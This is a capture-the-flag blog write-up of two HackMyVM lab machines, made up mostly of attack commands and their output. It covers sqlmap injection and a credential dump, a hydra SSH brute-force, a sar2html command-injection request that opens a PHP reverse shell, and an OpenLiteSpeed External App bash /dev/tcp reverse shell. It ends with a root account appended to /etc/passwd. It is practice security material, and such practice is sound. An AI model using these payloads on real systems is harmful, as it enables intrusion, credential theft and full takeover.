I’ve done a couple more HackMyVM boxes: Talk and Speed. Talk is Easy rated, Speed is Medium.
Talk
Talk was a webapp called chatME which we can find here and if we download it then it doesn’t appear to have any input sanitation so is probably open to SQLi.
┌──( root💀kali) -[/opt/hackmyvm/talk]
└─# sqlmap -r request --level = 2 --risk = 2 --batch
# etc
[ 21:13:27] [ INFO] POST parameter 'id' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
it looks like the back-end DBMS is 'MySQL' . Do you want to skip test payloads specific for other DBMSes? [ Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level ( 2) and risk ( 2) values? [ Y/n] Y
[ 21:13:27] [ INFO] testing 'Generic inline queries'
[ 21:13:27] [ INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[ 21:13:27] [ INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other ( potential) technique found
[ 21:13:27] [ INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[ 21:13:27] [ INFO] checking if the injection point on POST parameter 'id' is a false positive
POST parameter 'id' is vulnerable. Do you want to keep testing the others ( if any) ? [ y/N] N
sqlmap identified the following injection point( s) with a total of 549 HTTP( s) requests:
---
Parameter: id ( POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: msg = id ; id &id= 1' RLIKE (SELECT (CASE WHEN (4603=4603) THEN 1 ELSE 0x28 END)) AND ' UTLh'=' UTLh
---
[ 21:13:27] [ INFO] the back-end DBMS is MySQL
/usr/lib/python3/dist-packages/pkg_resources/__init__.py:116: PkgResourcesDeprecationWarning: Unknown is an invalid version and will not be supported in a future release
warnings.warn(
web application technology: Nginx 1.14.2
back-end DBMS: MySQL Unknown ( MariaDB fork)
[ 21:13:27] [ INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.10.10.66'
[ * ] ending @ 21:13:27 /2022-01-22/
So, yes. I carry on with sqlmap :
Database: chat
Table: user
[ 5 entries]
+--------+-----------------+-------------+-----------------+----------+
| userid | email | phone | password | username |
+--------+-----------------+-------------+-----------------+----------+
| 5 | david@david.com | 11 | adrianthebest | david |
| 4 | jerry@jerry.com | 111 | thatsmynonapass | jerry |
| 2 | nona@nona.com | 1111 | myfriendtom | nona |
| 1 | pao@yahoo.com | 09123123123 | pao | pao |
| 3 | tina@tina.com | 11111 | davidwhatpass | tina |
+--------+-----------------+-------------+-----------------+----------+
[ 21:14:44] [ INFO] table 'chat.`user`' dumped to CSV file '/root/.local/share/sqlmap/output/10.10.10.66/dump/chat/user.csv'
[ 21:14:44] [ INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.10.10.66'
[ * ] ending @ 21:14:44 /2022-01-22/
Privesc etc
┌──( root💀kali) -[/opt/hackmyvm/talk]
└─# hydra -L users -P pass ssh://10.10.10.66
Hydra v9.2 ( c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes ( this is non-binding, these *** ignore laws and ethics anyway) .
Hydra ( https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-22 21:16:51
[ WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[ DATA] max 16 tasks per 1 server, overall 16 tasks, 30 login tries ( l:6/p:5) , ~2 tries per task
[ DATA] attacking ssh://10.10.10.66:22/
[ 22][ssh] host: 10.10.10.66 login: nona password: thatsmynonapass
[ 22][ssh] host: 10.10.10.66 login: david password: davidwhatpass
[ 22][ssh] host: 10.10.10.66 login: jerry password: myfriendtom
[ 22][ssh] host: 10.10.10.66 login: adrian password: adrianthebest
1 of 1 target successfully completed, 4 valid passwords found
Hydra ( https://github.com/vanhauser-thc/thc-hydra) finished at 2022-01-22 21:16:57
┌──( root💀kali) -[/opt/hackmyvm/talk]
└─# ssh adrian@10.10.10.66
adrian@10.10.10.66s password:
Linux talk 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/* /copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
adrian@talk:~$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[ sudo ] password for adrian:
Sorry, user adrian may not run sudo on talk.
adrian@talk:~$ su jerry
Password:
jerry@talk:/home/adrian$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[ sudo ] password for jerry:
Sorry, user jerry may not run sudo on talk.
jerry@talk:/home/adrian$ su david
Password:
david@talk:/home/adrian$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[ sudo ] password for david:
Sorry, user david may not run sudo on talk.
david@talk:/home/adrian$ su nona
Password:
nona@talk:~$ sudo -l
Matching Defaults entries for nona on talk:
env_reset, mail_badpass, secure_path = /usr/local/sbin\: /usr/local/bin\: /usr/sbin\: /usr/bin\: /sbin\: /bin
User nona may run the following commands on talk:
( ALL : ALL) NOPASSWD: /usr/bin/lynx
nona@talk:/home/adrian$ sudo -u root /usr/bin/lynx -dump /root/.ssh/id_rsa > /tmp/id_rsa
nona@talk:/home/adrian$ cd /tmp
nona@talk:/tmp$ chmod 600 id_rsa
nona@talk:/tmp$ ssh -i id_rsa root@localhost
The authenticity of host 'localhost (::1)' cant be established.
ECDSA key fingerprint is SHA256:QnewK0l6AphbD9vYMwFTNEGQhVfJ8KlSn1BGwWO1D/Q.
Are you sure you want to continue connecting ( yes /no) ? yes
Warning: Permanently added 'localhost' ( ECDSA) to the list of known hosts.
Linux talk 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/* /copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Feb 18 04:34:23 2021
root@talk:~#
Speed
Here we had a few extra ports:
┌──( root💀kali) -[/opt/hackmyvm/speed]
└─# nmap -T4 -p22 ,80,7080,8088 -A 10.10.10.67 -oA nmap/tcp_detail
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-22 21:26 EST
Nmap scan report for 10.10.10.67
Host is up ( 0.00030s latency) .
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 ( protocol 2.0)
| ssh-hostkey:
| 2048 fe:07:9a:67:7f:8a:63:a7:48:46:46:bb:78:83:4e:d5 ( RSA)
| 256 5e:9b:35:e4:82:5f:eb:01:9b:6a:7b:cc:5b:16:00:4f ( ECDSA)
|_ 256 67:85:3b:a2:fb:3b:d0:d0:6b:45:a0:ae:2d:ac:1b:e9 ( ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesnt have a title ( text/html; charset = UTF-8) .
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
7080/tcp open ssl/http LiteSpeed httpd
|_ssl-date: TLS randomness does not represent time
|_http-title: Did not follow redirect to https://10.10.10.67:7080/login.php
| ssl-cert: Subject: commonName = speed/organizationName= webadmin/countryName= US
| Not valid before: 2021-02-17T08:51:38
|_Not valid after: 2023-02-17T08:51:38
|_http-server-header: LiteSpeed
| tls-alpn:
| h2
| spdy/3
| spdy/2
|_ http/1.1
8088/tcp open http LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Welcome
MAC Address: 08:00:27:48:3A:28 ( Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type : general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.30 ms 10.10.10.67
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done : 1 IP address ( 1 host up) scanned in 39.38 seconds
On the main website we had sar2html version 3.2.2 which famously has a command injection exploit in version 3.2.1. On the project github page, it describes the release of 3.2.2:
sar2html supports Ubuntu 20 now.
minor fixes
Um, ok. Does the command injection still work? Actually, yes:
GET /index.php?plot= ; php+-r+'$sock%3dfsockopen("10.10.10.2",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' HTTP/1.1
Host: 10.10.10.67
User-Agent: Mozilla/5.0 ( X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml; q = 0.9,image/webp,* /* ; q = 0.8
Accept-Language: en-US,en; q = 0.5
Accept-Encoding: gzip , deflate
Connection: close
Cookie: PHPSESSID = 2gk0g046qkm2crb2pi8p9jeqa7; miindex2 = 1
Upgrade-Insecure-Requests: 1
and
┌──( root💀kali) -[/opt/hackmyvm/speed]
└─# nc -nvlp 1234
listening on [ any] 1234 ...
connect to [ 10.10.10.2] from ( UNKNOWN) [ 10.10.10.67] 53314
/bin/sh: 0: cant access tty ; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@speed:~/html$ sudo -l
sudo -l
bash: sudo : command not found
www-data@speed:~/html$
With this, we can find some credentials for the OpenLiteSpeed 1.5.12 running on Port 7080.
www-data@speed:/usr/local/lsws$ ls -lash
ls -lash
total 132K
4.0K drwxr-xr-x 22 root root 4.0K Feb 17 2021 .
4.0K drwxr-xr-x 11 root root 4.0K Feb 17 2021 ..
4.0K drwxr-xr-x 6 root root 4.0K Feb 17 2021 Example
36K -rw-r--r-- 1 root root 35K Feb 17 2021 GPL.txt
4.0K -rw-r--r-- 1 root root 7 Feb 17 2021 VERSION
4.0K drwxr-xr-x 4 root root 4.0K Feb 17 2021 add-ons
4.0K drwxr-xr-x 9 root root 4.0K Feb 17 2021 admin
4.0K -rwxrwxrwx 1 root root 41 Feb 17 2021 adminpasswd
4.0K drwxr-xr-x 2 nobody nogroup 4.0K Jan 23 03:55 autoupdate
4.0K drwxr-xr-x 2 root root 4.0K Feb 17 2021 backup
4.0K drwxr-xr-x 2 root root 4.0K Feb 17 2021 bin
4.0K drwxr-xr-x 2 nobody nogroup 4.0K Feb 17 2021 cachedata
4.0K drwx--x--- 2 nobody nogroup 4.0K Jan 22 21:24 cgid
4.0K drwxr-x--- 5 lsadm nogroup 4.0K Feb 17 2021 conf
4.0K drwxr-xr-x 6 root root 4.0K Feb 17 2021 docs
4.0K drwxr-xr-x 2 root root 4.0K Feb 17 2021 fcgi-bin
4.0K drwxr-xr-x 2 root root 4.0K Feb 17 2021 gdata
4.0K drwxr-xr-x 2 root root 4.0K Feb 17 2021 lib
4.0K drwxr-xr-x 2 root root 4.0K Jan 22 21:24 logs
4.0K drwxr-xr-x 2 root root 4.0K Feb 17 2021 lsrecaptcha
4.0K drwxr-xr-x 2 root root 4.0K Feb 17 2021 modules
4.0K drwxr-xr-x 2 root root 4.0K Feb 17 2021 php
4.0K drwx------ 2 lsadm lsadm 4.0K Jan 23 03:55 phpbuild
4.0K drwxr-xr-x 3 root root 4.0K Feb 17 2021 share
4.0K drwxr-xr-x 3 nobody nogroup 4.0K Feb 17 2021 tmp
www-data@speed:/usr/local/lsws$ cat adminpasswd
cat adminpasswd
WebAdmin user/password is admin/MjE0MGU2
www-data@speed:/usr/local/lsws$
Now, we have OpenLiteSpeed 1.5.12 . There is an exploit described here for version 1.7.8 , but it also works for our version. Using the webapp, we can go to Server Configuration > External App and edit the (only) entry which is for LiteSpeed SAPI App. In command we enter our shell with this syntax:
fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/10.10.10.2/1234 0>&1'
and in Run as User and Run as Group we put root . This gets us a shell with GID of 0, but not UID. We also need to save the changes and run a ‘graceful’ restart to fire the shell.
┌──( root💀kali) -[/opt/hackmyvm/speed]
└─# nc -nvlp 1234
listening on [ any] 1234 ...
connect to [ 10.10.10.2] from ( UNKNOWN) [ 10.10.10.67] 53350
bash: cannot set terminal process group ( 26708) : Inappropriate ioctl for device
bash: no job control in this shell
nobody@speed:/usr/bin$ id
id
uid = 65534( nobody) gid = 0( root) groups = 0( root)
But with that, we can overwrite /etc/passwd :
id
uid = 65534( nobody) gid = 0( root) groups = 0( root)
nobody@speed:/usr/bin$ echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd
nobody@speed:/usr/bin$ su root2
su root2
Password: mrcake
id
uid = 0( root) gid = 0( root) groups = 0( root)
cd /root
ls -lash
total 32K
4.0K drwx------ 3 root root 4.0K Feb 17 2021 .
4.0K drwxr-xr-x 18 root root 4.0K Feb 17 2021 ..
4.0K -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
4.0K -rwx--x--x 1 root root 1.9K Feb 17 2021 flag.sh
4.0K drwxr-xr-x 3 root root 4.0K Feb 17 2021 .local
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -rw------- 1 root root 18 Feb 17 2021 root.txt
4.0K -rw-r--r-- 1 root root 66 Feb 17 2021 .selected_editor
And that’s that.